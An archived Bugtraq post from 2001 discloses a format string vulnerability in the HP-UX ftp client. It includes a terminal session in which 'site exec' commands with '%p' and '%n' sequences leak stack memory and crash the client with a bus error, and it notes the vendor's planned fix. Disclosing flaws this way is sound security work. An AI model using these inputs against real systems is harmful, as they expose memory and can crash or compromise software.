Home page logo

bugtraq logo Bugtraq mailing list archives

HP/UX FTP format string vulnerability
From: "[ zorgon ]" <zorgon () ANTIONLINE ORG>
Date: Mon, 8 Jan 2001 13:55:53 -0800

HP/UX FTP format string vulnerability

A format string vulnerability exists in ftp. This vulnerability was
discussed with HP labs.

$ uname -a
HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs
$ ftp localhost
Connected to localhost.
220 localhost FTP server (Version Wed Feb  9 08:03:34 GMT 2000) ready.
Name (localhost:zorgon):zorgon
331 Password required for zorgon.
230 User zorgon logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site exec %p %p %p %p
200-40008f10 00000003 00000002 00000001
200  (end of '40008f10 00000003 00000002 00000001')
ftp> site exec %n %n %n %n
Bus error(coredump)

And the 'SITE' command is also vulnerable
ftp> site %p %p %p %p
500 'SITE 40008F0C 00000002 00000002 00000001': command not understood.
ftp> site %n %n %n %n
Bus error(coredump)
$ file core
core:           fichier de vidage de la memoire de'ftp' - recu SIGBUS

The character format strings are not being parsed correctly in the ftp client.
When HP labs fix the problem in the client, the result will be :

ftp>  site exec %n %n %n %n
--->  SITE exec %n %n %n %n
200-%n %n %n %n
200  (end of '%n %n %n %n')

So in this case the ftpd server will not process the character format strings.
The fix will be made in the next release of the ftp client.

zorgon <zorgon () antionline org>

Email account furnished courtesy of AntiOnline - http://www.AntiOnline.com
AntiOnline - The Internet's Information Security Super Center!

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]